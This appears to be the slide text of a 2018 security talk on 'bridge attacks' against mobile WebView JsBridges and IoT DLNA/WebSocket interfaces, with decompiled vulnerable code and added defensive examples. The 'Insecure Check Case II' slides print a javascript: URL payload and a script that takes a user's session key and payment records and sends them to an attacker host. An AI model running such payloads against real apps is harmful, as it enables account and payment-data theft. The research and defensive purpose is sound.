Bridge Attack 
—Double-edged Sword in MobileSec 


Zidong Han


Self Introduction 


- Mobile security researcher
  - Tencent Mobile Security Labs Razor Team
- Focuses on app vulnerabilities and IoT-related security
- GeekPwn 2018 winner in "Hacker Pwn in House"

HITB SECCONF 2018 Beijing
What is Bridge Attack


Develop Fast Without Risk? 


What is Abstract Bridge 


- Mobile app
  > Android: JavaScript in WebView
  > iOS: UIWebView / WKWebView
- IoT device
  > DLNA / UPnP / WebSocket
"Unofficial" definition of Bridge Attack


Why a Bridge Attack 


WebView Attack in Past 


- Using addJavascriptInterface for RCE
  > CVE-2012-6636 (Java reflection through an injected interface on API level 16 and below)
- WebView cross-domain risk
  > setAllowFileAccess
  > setAllowFileAccessFromFileURLs
  > setAllowUniversalAccessFromFileURLs
- URL scheme attack
  > <scheme>://<host>:<port>/<path>?<query> handled by an exported component


Difference in Bridge Attack 


- More attack surface
  - The effect of a vulnerability is amplified by the bridge's ability
- Both mobile apps and IoT devices


Bridge Attack and Exploit Cases 


Bridge Attack Surface in Mobile Application 


[Figure: browser and mobile device as the two ends of the bridge]

Bypass Identification Check

> XSS attack from the URL
> Insecure domain check (CSRF)
> JS Bridge (@JavascriptInterface) man-in-the-middle attack


Insecure Check Case I 


> str.contains("safe.com")
> str.endsWith("safe.com") is bypassed by 123safe.com

Decompiled check from the app (identifiers obfuscated; the domain and interface strings are redacted on the slide):

    this.m
    s();
    boolean t = t();
    if (NewWebViewUtil.a.a(a, getApplicationContext())) {
        // substring match on the URL decides whether the JS interface stays exposed
        if (!a.contains("[redacted].com") && !HybridModuleApplication.a.a()) {
            this.a.removeJavascriptInterface("[redacted]");
        }
    } else if (!(NewWebViewUtil.a.b(a) || AccountManager.a.c() || DelayABTest.a.b() != 0)) {
        d = a;
        Routers.a(this, Pages.PAGE_WELCOME_CLEAR_STACK);
        finish();
    }


Exploit JsBridge Ability

> Custom JsApi: better or worse?
> Easy web attacks (e.g. CSRF) inside apps

Decompiled bridge method (the switch on type.hashCode() is how the decompiler renders a switch on a String; "GET".hashCode() is 70454 and "PUT".hashCode() is 79599):

    @JavascriptInterface
    public void sendClientRequest(@NotNull String str) {
        AjaxEntity ajaxEntity = (AjaxEntity) BridgeUtils.a(str, AjaxEntity.class);
        if (ajaxEntity != null && ajaxEntity.getData() != null) {
            AjaxInfo ajaxInfo = (AjaxInfo) ajaxEntity.getData();
            final String callback = ajaxEntity.getCallback();
            if (ajaxInfo.getType() != null) {
                Observable call;
                Map a = BridgeUtils.a(ajaxInfo.getData());
                Map hashMap = new HashMap();
                if (a != null) {
                    for (Entry entry : a.entrySet()) {
                        hashMap.put(entry.getKey(), entry.getValue().toString());
                    }
                }
                // the target URL comes straight from the page: any host, sent with the app's credentials
                HttpUrl.Builder a2 = BridgeModel.a(ajaxInfo.getUrl());
                String type = ajaxInfo.getType();
                Object obj = -1;
                switch (type.hashCode()) {
                    case 70454:
                        if (type.equals("GET")) {
                            obj = null;
                            break;
                        }
                        break;
                    case 79599:
                        if (type.equals("PUT")) {
                            obj = 2;
                            break;
                        }
                        ...

Insecure Check Case II

http://xxx.com/mobile/middle page/index.html?url=javascript:alert(document.cookie);//m2.mobike.com

Page-side check (JavaScript in the web page; parts omitted on the slide):

    function callQQ(url, options) {
        ...
        env: options && options.env || 'unknown'
        ...
        utils.getXHR(url, function () {
            // substring check on the raw URL: a javascript: URL with the
            // domain in a trailing comment passes
            if (url.indexOf('m2.mobike.com') > -1) {
                // location.<method>(url)  (the navigation method name is unreadable on the slide)
                return true;
            }
        });
        ...
        jumpUrl(url);
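The two cases above fail the same way: Case I checks the raw string with contains/endsWith and Case II with indexOf, so a glued prefix, a look-alike subdomain, a query parameter, a userinfo component or a javascript: URL all pass. The following is an added example, not code from the slides or from either app: the weak checks side by side with a strict check that parses the URL, requires https, and matches the hostname exactly or as a dot-bounded subdomain. The allowlist, the domain names in the weak checks and the attacker URLs are constructed for illustration.

```javascript
// Added example (not from the slides): the raw-string host checks from
// Case I (contains / endsWith) and Case II (indexOf), next to a strict check
// that parses the URL. The allowlist and the attacker URLs are constructed.

const ALLOWED_DOMAINS = ['safe.com', 'm2.mobike.com']; // assumed first-party domains

// Case I style: substring / suffix match on the raw string.
function weakContains(url) {
  return url.includes('safe.com');
}
function weakEndsWith(url) {
  return url.endsWith('safe.com');
}

// Case II style: indexOf on the raw URL, which also accepts a javascript: URL.
function weakIndexOf(url) {
  return url.indexOf('m2.mobike.com') > -1;
}

// Strict check: parse, require https, then match the hostname exactly or as a
// dot-bounded subdomain of an allowlisted domain. Unparseable input is rejected.
function strictCheck(url) {
  let u;
  try {
    u = new URL(url);
  } catch (e) {
    return false; // relative or malformed URL
  }
  if (u.protocol !== 'https:') return false; // rejects javascript:, file:, http:, intent: ...
  const host = u.hostname.toLowerCase();
  return ALLOWED_DOMAINS.some((d) => host === d || host.endsWith('.' + d));
}

// Run every check over a list of URLs and report which ones each URL passes.
function evaluate(urls) {
  return urls.map((url) => ({
    url,
    contains: weakContains(url),
    endsWith: weakEndsWith(url),
    indexOf: weakIndexOf(url),
    strict: strictCheck(url),
  }));
}

// Constructed inputs: two legitimate URLs, then bypass attempts.
const SAMPLE_URLS = [
  'https://api.safe.com/v1/profile',
  'https://m2.mobike.com/mobile/index.html',
  'https://123safe.com',                                // Case I: glued prefix, passes endsWith
  'https://evil.com/?next=safe.com',                    // allowlisted string in the query
  'https://safe.com.evil.com/',                         // allowlisted domain as a leading label
  'https://safe.com@evil.com/',                         // userinfo before the real host
  'javascript:alert(document.cookie);//m2.mobike.com',  // Case II: not http(s) at all
  'http://safe.com/',                                   // right host, cleartext channel
];

if (typeof require !== 'undefined' && require.main === module) {
  for (const r of evaluate(SAMPLE_URLS)) console.log(r);
}
```

Only the first two sample URLs survive the strict check; every bypass passes at least one of the weak ones. Parsing with the platform URL parser is what makes the userinfo and javascript: cases fall out, and the scheme check is what enforces the "encrypted channel" rule from the defense slide at the same time.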
Insecure Check Case II

Payload (shown percent-encoded on the slide; decoded here):

    javascript:s=document.createElement("script");s.src="http://yaphetsh.com/test.js";document.body.appendChild(s);setTimeout("testabc()",1000);

> Imports a JS file from an external URL
> Executes any sensitive JsApi
> Sends the user's sensitive data to a malicious URL


Insecure Check Case II

test.js fetched by the payload (host names in the URLs are partly blurred on the slide):

    // import the vendor's JsApi SDK so the injected script can reach the native bridge
    var newElement = document.createElement('script');
    newElement.setAttribute('type', 'text/javascript');
    newElement.setAttribute('src', 'http://open mobil n/sdk/ .js?_bid=152');
    document.body.appendChild(newElement);

    function testabc() {
        var uin, skey;
        // call the getUserInfo JsApi
        mqq.data.getUserInfo(function (responseText) {
            uin = responseText.uin;
            skey = responseText.skey;
            // call the sendRequest JsApi to fetch the user's payment records with the app's credentials
            mqq.data.sendRequest({
                url: "https:// .com/cgi-bin/clientv1.0/ llet record list.cgi",
                params: { ... },
                options: { method: "POST" }
            }, function (responseText) {
                var result = JSON.stringify(responseText);
                // steal the user's payment info: ship it to the attacker's server
                window.location.href = encodeURI("http:// etsh.com/attact?name=" + result);
            });
        });
    }


Attack From A Malicious URL

[Figure: complete exploit chain from a malicious URL. Payload URL -> parse URI -> WebView container -> JsBridge ability -> native JsAPI]
What Is Different in the IoT Bridge

> Penetrate the LAN from the WAN
  - DNS rebinding
  - Bridge attack in the brain app
  - Other remote attack entries
> Persistent attack during exploitation
  - More zombie hosts ("broilers") to choose from in a LAN
  - More attack modes can be designed and used


IoT Bridge With Cloud Server

[Figure: abstract IoT bridge with a cloud server: Application -> command request -> Cloud Server -> device]

IoT Bridge Without Cloud Server

[Figure: abstract IoT bridge without a cloud server: IoT in private networks, application and device on the same LAN]

Bridge Attack Surface in IoT Devices

[Figure: bridge in the IoT device; IoT in private networks]
IoT Bridge Attack Case I

DLNA Action

> Exposes interfaces with no identity checking
> Basically controls media playback
> Specifically, can inject a backdoor into the TV


    <serviceList>
      <service>
        <serviceType>urn:schemas-upnp-org:service:AVTransport:1</serviceType>
        <serviceId>urn:upnp-org:serviceId:AVTransport</serviceId>
        <SCPDURL>AVTransport.scpd.xml</SCPDURL>
        <controlURL>_urn:schemas-upnp-org:service:AVTransport_control</controlURL>
        <eventSubURL>_urn:schemas-upnp-org:service:AVTransport_event</eventSubURL>
      </service>
      <service>
        <serviceType>urn:schemas-upnp-org:service:ConnectionManager:1</serviceType>
        <serviceId>urn:upnp-org:serviceId:ConnectionManager</serviceId>
        <SCPDURL>ConnectionManager.scpd.xml</SCPDURL>
        <controlURL>_urn:schemas-upnp-org:service:ConnectionManager_control</controlURL>
        <eventSubURL>_urn:schemas-upnp-org:service:ConnectionManager_event</eventSubURL>
      </service>
      <service>
        <serviceType>urn:schemas-upnp-org:service:RenderingControl:1</serviceType>
        <serviceId>urn:upnp-org:serviceId:RenderingControl</serviceId>
        <SCPDURL>RenderingControl.scpd.xml</SCPDURL>
        <controlURL>_urn:schemas-upnp-org:service:RenderingControl_control</controlURL>
        <eventSubURL>_urn:schemas-upnp-org:service:RenderingControl_event</eventSubURL>
      </service>
    </serviceList>


IoT Bridge Attack Case I

> Sensitive UPnP actions make security worse
> Remote download -> install app -> launch app
> Attacker entering the private network

Decompiled MediaRenderer action handler: the vendor-specific SendMessage and InstallApk actions sit next to the standard AVTransport actions and are reachable by any LAN peer that can send a SOAP action:

    } else if (serviceType.equals("urn:schemas-upnp-org:service:AVTransport:1")) {
        if ("GetDeviceCapabilities".equals(action.getName())) {
            action.setArgumentValue("PlayMedia", "NONE,NETWORK,HDD,CD-DA,UNKNOWN");
            action.setArgumentValue("RecMedia", "NOT_IMPLEMENTED");
            action.setArgumentValue("RecQualityModes", "NOT_IMPLEMENTED");
            return true;
        } else if ("GetCurrentTransportActions".equals(action.getName())) {
            action.setArgumentValue("Actions", "Play,Pause,Stop,Seek,Next,Previous");
            return true;
        } else if (action.getName().equals("SendMessage")) {
            serviceType = action.getArgumentValue("Message");
            stringBuilder = new StringBuilder();
            stringBuilder.append("SendMessage = ");
            stringBuilder.append(serviceType);
            c.c("MediaRendererDevice", stringBuilder.toString());
            a(serviceType, action);
            return true;
        } else if (action.getName().equals("InstallApk")) {
            // filename and filecontent are taken from the request with no authentication
            serviceType = action.getArgumentValue("filename");
            r8 = action.getArgumentValue("filecontent");
            stringBuilder = new StringBuilder();
            stringBuilder.append(">>>>>InstallApk ");
            stringBuilder.append(serviceType);
            c.c("MediaRendererDevice", stringBuilder.toString());
            Intent intent = new Intent();
            intent.setAction("InstallApk");
            intent.putExtra("filename", serviceType);
            intent.putExtra("filecontent", r8);
            a(intent);
            return true;


IoT Bridge Attack Case II

WebSocket

[Capture: line-based text data, 1 line, truncated on the slide: {"appId":"9000015369155", "appName":"...]

> Center app with no code protection
> Communicates with the TV with no identity check
> Remote attack: imitate the center app's actions against the smart TV

[Capture: app-store download request to the TV, truncated on the slide; visible fragments include ttv.com/, appstore, appDownloadUrl, appId, version parameters and an apkUrl]


Defending Against the Bridge Attack

- For JsBridge:
  > Check identity seriously
  > Constrain the permissions of the bridge ability
  > Ensure communication security with an encrypted channel (e.g. HTTPS)
- For IoTBridge:
  > Same security policy as JsBridge
  > Be cautious in expanding and abusing the bridge ability
  > Make sure your command actions carry authentication tickets
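The first two JsBridge rules above, "check identity" and "constrain the bridge ability", are one mechanism when written down: the native side derives the caller's origin from the URL the WebView actually loaded (never from anything the page sends) and each native API lists the origins allowed to call it. The following is an added example, not code from the slides or from any vendor SDK: a dispatcher with a per-API origin allowlist, a pinned set of target hosts for the request-proxying API from the sendClientRequest case, and an audit trail of every decision. API names, origins and the native stubs are assumptions for illustration.

```javascript
// Added example, not from the slides or any vendor SDK: a JsBridge dispatcher
// that applies "check identity" and "constrain the bridge ability" per API.
// The caller's origin comes from the URL the WebView loaded, and each API
// lists the origins that may call it. API names, origins and the native
// stubs are assumptions for illustration.

// Exact origin (scheme + host + port) per API. 'any-https' is reserved for
// APIs that leak nothing; an empty list means "never from web content".
const API_POLICY = {
  getDeviceInfo: { origins: 'any-https' },
  getUserInfo: { origins: ['https://m2.mobike.com'] },
  sendRequest: {
    origins: ['https://m2.mobike.com'],
    targetHosts: ['m2.mobike.com', 'api.mobike.com'], // requests carry app credentials: pin the hosts
  },
  installApk: { origins: [] },
};

// Constructed native stubs standing in for the @JavascriptInterface methods.
const NATIVES = {
  getDeviceInfo: () => ({ model: 'demo-phone', os: 'android' }),
  getUserInfo: () => ({ uin: '10001', skey: 'session-key-placeholder' }),
  sendRequest: (args) => ({ status: 200, url: args.url }),
  installApk: () => { throw new Error('installApk must not be reachable from web content'); },
};

// Identity of the calling page: only an https page gets an origin at all.
function originOf(pageUrl) {
  try {
    const u = new URL(pageUrl);
    return u.protocol === 'https:' ? u.origin : null;
  } catch (e) {
    return null;
  }
}

// Host of an outbound request, only if it is https; anything else yields null.
function httpsHostOf(url) {
  try {
    const u = new URL(url);
    return u.protocol === 'https:' ? u.hostname : null;
  } catch (e) {
    return null;
  }
}

class BridgeDispatcher {
  constructor(policy, natives) {
    this.policy = policy;
    this.natives = natives;
    this.audit = []; // every decision, allowed or not, for detection and forensics
  }

  dispatch(pageUrl, api, args = {}) {
    const rule = this.policy[api];
    const origin = originOf(pageUrl);
    let reason = null;
    if (!rule) reason = 'unknown api';
    else if (origin === null) reason = 'untrusted scheme';
    else if (rule.origins !== 'any-https' && !rule.origins.includes(origin)) reason = 'origin not allowed';
    else if (rule.targetHosts && !rule.targetHosts.includes(httpsHostOf(args.url))) reason = 'target host not allowed';
    this.audit.push({ origin, api, ok: reason === null, reason });
    if (reason !== null) return { ok: false, error: reason };
    return { ok: true, result: this.natives[api](args) };
  }
}

// Constructed calls: a first-party page, a look-alike and a foreign origin,
// a cleartext page, and the bridge-driven CSRF from the sendClientRequest case.
function demo() {
  const bridge = new BridgeDispatcher(API_POLICY, NATIVES);
  const first = 'https://m2.mobike.com/mobile/index.html';
  return {
    firstPartyUser: bridge.dispatch(first, 'getUserInfo'),
    lookAlike: bridge.dispatch('https://m2.mobike.com.evil.com/', 'getUserInfo'),
    foreignDevice: bridge.dispatch('https://evil.com/', 'getDeviceInfo'),
    cleartextPage: bridge.dispatch('http://m2.mobike.com/', 'getUserInfo'),
    csrfToEvil: bridge.dispatch(first, 'sendRequest', { url: 'https://evil.com/collect' }),
    firstPartyRequest: bridge.dispatch(first, 'sendRequest', { url: 'https://api.mobike.com/v1/wallet' }),
    installFromWeb: bridge.dispatch(first, 'installApk', { filename: 'x.apk' }),
    unknownApi: bridge.dispatch(first, 'execShell'),
    audit: bridge.audit,
  };
}

if (typeof require !== 'undefined' && require.main === module) console.log(demo());
```

One caveat follows directly from Case II: a javascript: URL or a DOM XSS runs inside the allowlisted page and therefore carries that page's origin, so origin checks alone do not stop it. That is why the policy keeps the capability set of even the first-party origin minimal and pins sendRequest to first-party hosts, and why the page-side URL check and the native-side origin check both have to hold.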


Conclusion 


- More targets: mobile apps and IoT devices
- Attack surface: integrates web attacks with app/IoT attacks
- Easy to use: needs only a malicious URL, and can spread quickly and widely
- Exploit ability: RCE/LCE, sensitive information leak, APT


Thanks 


